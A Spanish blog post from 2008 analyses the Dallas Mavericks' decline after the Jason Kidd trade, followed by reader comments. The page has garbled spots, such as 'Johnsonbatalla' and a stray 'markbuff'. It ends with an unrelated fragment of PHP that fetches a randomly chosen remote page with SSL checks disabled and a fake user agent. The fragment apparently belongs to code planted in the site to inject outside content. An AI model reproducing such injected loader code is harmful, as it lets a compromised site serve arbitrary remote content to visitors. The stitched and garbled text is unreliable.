Un trabajo mal hecho

31 de March de 2008 por Viva_Dirk

Dallas Mavericks se encuentra a día de hoy en una situación crítica: octavo del Oeste empatado con Denver (7º) y Golden State (9º), sin Nowitzki (y ahora también sin Stackhouse), con un equipo que si ha notado algo con la llegada de Kidd ha sido para mal y con un calendario final en el que 5 de sus 9 partidos son contra equipos con un balance igual o superior al suyo. Y lo que es peor: un proyecto inundado por un mar de dudas que tienen a Mark Cuban con el agua al cuello.

La llegada de Jason Kidd a los Mavs se vio desde la franquicia como la última oportunidad de alargar el actual proyecto. Algunos escépticos hubo, pero en general se creía en buena lógica que Mr.Triple Doble mejoraría a los de Avery Johnson. Pero la realidad es que desde la llegada de Kidd han pasado 20 partidos en los cuales el base ha bajado su rendimiento, sin llegar a dobles dígitos en ningún apartado estadístico, con un balance de 10-10 y un escandaloso 0-10 contra equipos con balance positivo.

El equipo ha empeorado defensivamente. Pese a que Kidd tiene buenas manos, Devin Harris ofrecía más prestaciones en ese lado de la cancha. Además, Dampier se ha quedado como único pívot y, aunque parezca mentira, el equipo se resiente sin Diop: los Mavs están sufriendo lo indecible bajo los aros, están perdiendo con frecuencia la Howard y Johnsonbatalla por el rebote y eso afecta directamente a la capacidad de Jason Kidd para lanzar el contraataque. Éste es una de las razones por las que la fluidez atacante que se le supone a un equipo con los recursos de los Mavericks no ha sido tal: desde que se produjera el trade han superado los 100 puntos en 11 ocasiones de 20 posibles y el rendimiento de Josh Howard ha bajado. Desde la llegada del base hasta la lesión de Dirk, el alero estrella de los Mavs estaba en 16.7 puntos y 6 rebotes con un 43% en el tiro, cuando antes previamente estaba en 20.4 puntos y 7.5 rebotes con un 47.3% en tiros.

markbuff

Para colmo, afrontan este final de temporada sin el actual MVP y auténtico baluarte del equipo, quien además no parecía haber entrado en la racha negativa del equipo e incluso había subido sus prestaciones después del traspaso. Desde la franquicia texana se comenta que Nowitzki puede regresar el miércoles para el fundamental partido contra los Warriors, un encuentro más decisivo para ambos equipos que los otros 81 de regular season.

El retorno del alemán es el salvavidas al que se aferra la franquicia de Mark Cuban para no terminar de hundirse. Tanto si no se clasifican para Playoffs como si caen en primera ronda, huele a renovación en Dallas. Posiblemente le darán una nueva oportunidad a la pareja Nowitzki-Kidd y buscarán un tercer espada que no sea Josh Howard. Pero lo primero que deberían hacer es mirar hacia el banquillo, donde Avery Johnson ha demostrado que no sabe cambiar el guión cuando éste no funciona y que ya fue superado en Playoffs clarísimamente por los planteamientos de Riley y Nelson.

Comenta

6 comentarios a esta entrada

  1. Dantley dice:
    #1

    Esto no entraba en ninguna quiniela. Creo que éste y el de Shaq pasarán a la historia como ejemplos de lo que no es dar un salto de calidad.

      Citar

  2. Noelinho dice:
    #2

    Pero cuidadito con que se clasifiquen para playoffs y recuperen a Dirk, serían un dulce muy peligroso para cualquier equipo.

      Citar

  3. MagicJohnson32 dice:
    #3

    Pero Noe, las sensaciones que dejan los Mavs es que son incapaces de ganar una serie a cualquiera de los de arriba del Oeste. Quién sabe, tal vez se transformen y se pongan a ganar y a jugar bien, pero no tiene pinta de que vaya a suceder. Podrían pasar contra los Rockets, pero no los veo ganando ni a Spurs, ni a Lakers, ni a Jazz, ni a Suns.

      Citar

  4. Noelinho dice:
    #4

    no, si yo pienso lo mismo, que no los veo como un equipo favorito a ganar a casi nadie de los de arriba, pero aún así no los descartaría tan rápido.

      Citar

  5. Viva_Dirk dice:
    #5

    Yo creo que si entran serán peligrosos siempre que Dirk esté sano. Al fin y al cabo tienen una gran plantilla, aunque Johnson no la haga funcionar.

      Citar

  6.   Lo mejor de la semana en el mundo NBA by  dice:
    #6

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>